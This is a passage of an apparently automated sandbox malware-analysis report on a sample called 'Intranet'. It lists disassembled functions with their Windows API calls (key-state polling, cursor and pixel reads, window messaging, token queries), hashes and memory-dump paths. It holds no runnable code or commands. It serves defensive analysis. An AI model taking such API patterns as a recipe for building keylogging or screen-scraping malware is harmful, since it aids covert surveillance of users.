                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 1389676194-0
                                                                            • Opcode ID: c5beefc853113d8db717963a94a8ce1e188b6260f79ffbdb1c0ec1b6ddea51c1
                                                                            • Instruction ID: 853fbab880fd9649b3be7e05beafa8d220f2addd0d62751d901191d0d43c5831
                                                                            • Opcode Fuzzy Hash: c5beefc853113d8db717963a94a8ce1e188b6260f79ffbdb1c0ec1b6ddea51c1
                                                                            • Instruction Fuzzy Hash: 75516D35A00105DFCB01EF65C981EAEBBF5FF49314B14809AE809AB3A1CB35ED10DB54
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8ce5d5a53dfd880fbda9ec5ac80bc2d57b76b2e54744bef8c0f17831e5c1b34
                                                                            • Instruction ID: 38538b4265022b2a767f3acff8657f265b7cdb914e7914d2b87b60eab0907134
                                                                            • Opcode Fuzzy Hash: a8ce5d5a53dfd880fbda9ec5ac80bc2d57b76b2e54744bef8c0f17831e5c1b34
                                                                            • Instruction Fuzzy Hash: 2141D435900224AFD710DB28EC88FA9BFB4FF0B310F180565F816A72D2D770AD41EA55
                                                                            APIs
                                                                            • GetCursorPos.USER32(?,?,005677B0,?,005677B0,005677B0,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?), ref: 004A2727
                                                                            • ScreenToClient.USER32(005677B0,?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001), ref: 004A2744
                                                                            • GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2769
                                                                            • GetAsyncKeyState.USER32(?,?,0052C5FF,00000000,00000001,?,?,?,004DBD40,?,?,?,?,?,00000001,?), ref: 004A2777
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: AsyncState$ClientCursorScreen
                                                                            • String ID:
                                                                            • API String ID: 4210589936-0
                                                                            • Opcode ID: c326ede0d87cb73ec1071cccf2d7abe6f77ada2c73ae1441711282f8aff29b56
                                                                            • Instruction ID: a9d46261fbffb2c484571e57180213c85583333a03955de5fdbf0963bf55116c
                                                                            • Opcode Fuzzy Hash: c326ede0d87cb73ec1071cccf2d7abe6f77ada2c73ae1441711282f8aff29b56
                                                                            • Instruction Fuzzy Hash: 8441713550411AFBCF159F68C944AEABB74FB16324F20435BF824923D0C734AE54EB95
                                                                            APIs
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001,?,00000002,?,?,?,?,004ABCD4,?,?), ref: 004A52E6
                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004A534A
                                                                            • TranslateMessage.USER32(?,?), ref: 004A5356
                                                                            • DispatchMessageW.USER32(?), ref: 004A5360
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Peek$DispatchTranslate
                                                                            • String ID:
                                                                            • API String ID: 1795658109-0
                                                                            • Opcode ID: 5b63790f741872ffba3264d848187bca261e235f7c744e303e62508ee39ae478
                                                                            • Instruction ID: f0e235b3ed5057b3a7a765c5a4bd9e3d40120c77ae7743f7496506d2ceb1dbcd
                                                                            • Opcode Fuzzy Hash: 5b63790f741872ffba3264d848187bca261e235f7c744e303e62508ee39ae478
                                                                            • Instruction Fuzzy Hash: 7831F8319047099BEF308B689D54BAA37E89B76348F14005BE812873D1D7F99849E71A
                                                                            APIs
                                                                            • GetWindowRect.USER32(?,?), ref: 004F95E8
                                                                            • PostMessageW.USER32(?,00000201,00000001,?,?,?), ref: 004F9692
                                                                            • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 004F969A
                                                                            • PostMessageW.USER32(?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004F96A8
                                                                            • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 004F96B0
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostSleep$RectWindow
                                                                            • String ID:
                                                                            • API String ID: 3382505437-0
                                                                            • Opcode ID: 55604a755c2970bd094ee3e016cc065fa27db6e160b9530aa65574bd68c36d34
                                                                            • Instruction ID: 5da21cfb4bcd15787c0e28895f2011d59990952c8fc817806f5c7ecd0311478f
                                                                            • Opcode Fuzzy Hash: 55604a755c2970bd094ee3e016cc065fa27db6e160b9530aa65574bd68c36d34
                                                                            • Instruction Fuzzy Hash: 4431BC7190021DEBEF14CF68D94DBAE3BB5EB44315F10421AFA24EA2D0C3B49D24DB95
                                                                            APIs
                                                                            • IsWindowVisible.USER32(?,?,?,?,?), ref: 004FBD9D
                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000,?,?,?,?), ref: 004FBDBA
                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000,?,?,?,?), ref: 004FBDF2
                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 004FBE18
                                                                            • _wcsstr.LIBCMT ref: 004FBE22
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                            • String ID:
                                                                            • API String ID: 3902887630-0
                                                                            • Opcode ID: 9206a7f14002e17b4b653a069e7e1949a4af6d0db53b590bf5e7c3fd2da76b36
                                                                            • Instruction ID: 23201704205db4f889dfd0b22f383637e3e05f66597d6c005854a32cf12e68e0
                                                                            • Opcode Fuzzy Hash: 9206a7f14002e17b4b653a069e7e1949a4af6d0db53b590bf5e7c3fd2da76b36
                                                                            • Instruction Fuzzy Hash: 52213E36204208BBEB255B35DC09F7B7B9CDF46750F10402FFA09CA291EB69DC4092E5
                                                                            APIs
                                                                              • Part of subcall function 004A29E2: GetWindowLongW.USER32(?,000000EB,?,?,?,004A1CE4,?), ref: 004A29F3
                                                                            • GetWindowLongW.USER32(?,000000F0,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B804
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000001,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B829
                                                                            • SetWindowLongW.USER32(00000000,000000EC,000000FF,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B841
                                                                            • GetSystemMetrics.USER32(00000004,?,?,?,?,?,?,?,0051155C,00000000,?,00000000), ref: 0052B86A
                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,0051155C,00000000), ref: 0052B888
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$Long$MetricsSystem
                                                                            • String ID:
                                                                            • API String ID: 2294984445-0
                                                                            • Opcode ID: 3b2bb41cbef086007ac9733fbd5723c713fe8eef4627db5fcff7852e9017ed33
                                                                            • Instruction ID: e1d5c1efbfc7ce178c2c45d196df909ab1257cf557570b2690e7a9ad2cb2ae29
                                                                            • Opcode Fuzzy Hash: 3b2bb41cbef086007ac9733fbd5723c713fe8eef4627db5fcff7852e9017ed33
                                                                            • Instruction Fuzzy Hash: B721A371914225AFDB149F39AC08B6A3FA8FF1A724F144B39F925D32E0E7308814DB80
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004F9ED8
                                                                              • Part of subcall function 004B1821: _memmove.LIBCMT ref: 004B185B
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002,00530980,?,00001004,00000000,00000000), ref: 004F9F0A
                                                                            • __itow.LIBCMT ref: 004F9F22
                                                                            • SendMessageW.USER32(?,0000102C,00000000,00000002,00530980,?,00001004,00000000,00000000), ref: 004F9F4A
                                                                            • __itow.LIBCMT ref: 004F9F5B
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$__itow$_memmove
                                                                            • String ID:
                                                                            • API String ID: 2983881199-0
                                                                            • Opcode ID: 90cc01df93c016c586a2b33faf442ed39fd0469793e8942c998b213b6936e84b
                                                                            • Instruction ID: e8887d1ddaa1a769cef80c22ddf021e4138b3dbde1c363984a6f0404f5c732ea
                                                                            • Opcode Fuzzy Hash: 90cc01df93c016c586a2b33faf442ed39fd0469793e8942c998b213b6936e84b
                                                                            • Instruction Fuzzy Hash: C2210A31701208BBDB11AE658C9AFFF7BA8EB89714F04502AFA00D7281D674CD4597F5
                                                                            APIs
                                                                            • IsWindow.USER32(00000000), ref: 00516159
                                                                            • GetForegroundWindow.USER32 ref: 00516170
                                                                            • GetDC.USER32(00000000), ref: 005161AC
                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 005161B8
                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 005161F3
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ForegroundPixelRelease
                                                                            • String ID:
                                                                            • API String ID: 4156661090-0
                                                                            • Opcode ID: 1a29e202e2c4d63adaca9a4f2457498d2682883e5d21241cfb6439a2f7d84e6c
                                                                            • Instruction ID: 716bbc870611ebf076da295d6c3266a28c04acd64065963fdfdaaf0ee79d7df0
                                                                            • Opcode Fuzzy Hash: 1a29e202e2c4d63adaca9a4f2457498d2682883e5d21241cfb6439a2f7d84e6c
                                                                            • Instruction Fuzzy Hash: 2E21C375A00204AFD700EF65DD89AAEBBF9FF98310F048469F94A97352CB30AC44DB90
                                                                            APIs
                                                                            • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 004A1729
                                                                            • SelectObject.GDI32(?,00000000), ref: 004A1738
                                                                            • BeginPath.GDI32(?), ref: 004A174F
                                                                            • SelectObject.GDI32(?,00000000,000000FF,00000000), ref: 004A1778
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ObjectSelect$BeginCreatePath
                                                                            • String ID:
                                                                            • API String ID: 3225163088-0
                                                                            • Opcode ID: 8906cc151720f23a2b90013254bded52e3776159e8a2f315ec33432a04e1067a
                                                                            • Instruction ID: bfd1dcd06c32778b135ac30428dbce5db7e4ff0f897cefc27ab9ca9f0d78c310
                                                                            • Opcode Fuzzy Hash: 8906cc151720f23a2b90013254bded52e3776159e8a2f315ec33432a04e1067a
                                                                            • Instruction Fuzzy Hash: 3621B030804308EBDB108F28DD4876E3BA8E739329F144257F815A72B0D3B59C99EB88
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memcmp
                                                                            • String ID:
                                                                            • API String ID: 2931989736-0
                                                                            • Opcode ID: 678833f896c76db86191bdb6f7971e6aa9d6f3cc256033e2d736b1b352aa2c98
                                                                            • Instruction ID: 68a0d8b52c218bc0fc7bd425f10ff919b17cbc737852ee5aacb5d7568b0c73cb
                                                                            • Opcode Fuzzy Hash: 678833f896c76db86191bdb6f7971e6aa9d6f3cc256033e2d736b1b352aa2c98
                                                                            • Instruction Fuzzy Hash: 5601D272B0010D3BE20076129EC2FBB675CAE613D9F04402FFF0696342E768DE1592E9
                                                                            APIs
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00505075
                                                                            • __beginthreadex.LIBCMT ref: 00505093
                                                                            • MessageBoxW.USER32(?,?,?,?), ref: 005050A8
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 005050BE
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 005050C5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                                                            • String ID:
                                                                            • API String ID: 3824534824-0
                                                                            • Opcode ID: 5b38ce280557569d40475082f675e15b0ca2b0346b1d2c4dd84bd540fcbf91d0
                                                                            • Instruction ID: b498ea74fbf9b2cec7f86767215581e37391906e6cdc712c6151de88be9bf38a
                                                                            • Opcode Fuzzy Hash: 5b38ce280557569d40475082f675e15b0ca2b0346b1d2c4dd84bd540fcbf91d0
                                                                            • Instruction Fuzzy Hash: 2911E97590470C6BC7119BA89C28A9F7FACAB55324F140255F814D33D0D67189089BF0
                                                                            APIs
                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?,00000000,00000000,00000000,?,?,004F8900,?,?,?), ref: 004F8E3C
                                                                            • GetLastError.KERNEL32(?,004F8900,?,?,?), ref: 004F8E46
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,004F8900,?,?,?), ref: 004F8E55
                                                                            • HeapAlloc.KERNEL32(00000000,?,004F8900,?,?,?), ref: 004F8E5C
                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?,?,004F8900,?,?,?), ref: 004F8E73
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 842720411-0
                                                                            • Opcode ID: 7b4b1bdc7f12ed6621a90ebc4a9a336c5fb28f442d94d2378b5c0bf0698b9422
                                                                            • Instruction ID: d6de85a8c87ee021da568f597e81e2f5de3d57780d81f68fa978bb5c649128b7
                                                                            • Opcode Fuzzy Hash: 7b4b1bdc7f12ed6621a90ebc4a9a336c5fb28f442d94d2378b5c0bf0698b9422
                                                                            • Instruction Fuzzy Hash: 53016D70200308BFDB205FA6DC59D7B7BADEF99754B10056AF949C63A0DB319C14DA60
                                                                            APIs
                                                                            • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0050581B
                                                                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00505829
                                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505831
                                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0050583B
                                                                            • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00505877
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                            • String ID:
                                                                            • API String ID: 2833360925-0
                                                                            • Opcode ID: d10968285aedc149b7c5a4a32c8ce2160d08cb3cd6724d66f16d9d5976d2307f
                                                                            • Instruction ID: aa5e47d0eddc6a8a999563d4c5a46782a4b7d5840c4277cce837fdfc2a379b87
                                                                            • Opcode Fuzzy Hash: d10968285aedc149b7c5a4a32c8ce2160d08cb3cd6724d66f16d9d5976d2307f
                                                                            • Instruction Fuzzy Hash: E0013531C01A1D9BCF00ABA5ED589EEBBB8FF18711F108556E901B2280EB309554EBA1
                                                                            APIs
                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?,?,004F8073), ref: 004F7D45
                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D60
                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D6E
                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?), ref: 004F7D7E
                                                                            • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,004F7C62,80070057,?,?), ref: 004F7D8A
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            • Opcode ID: 55a9713ba4e973bbaea7a89767fb03902cd83a3279cab946e98a53901e9c8869
                                                                            • Instruction ID: b8c6e085ead73d09d6d7256b0c7484b7fff2eb4d8b15e76899255e859d4b4224
                                                                            • Opcode Fuzzy Hash: 55a9713ba4e973bbaea7a89767fb03902cd83a3279cab946e98a53901e9c8869
                                                                            • Instruction Fuzzy Hash: 0901BC76601318ABDB104F54DC04BBABBBDEF44352F504069FA08D2310D739ED00DBA0
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F8CDE
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F8CE8
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F8CF7
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F8CFE
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F8D14
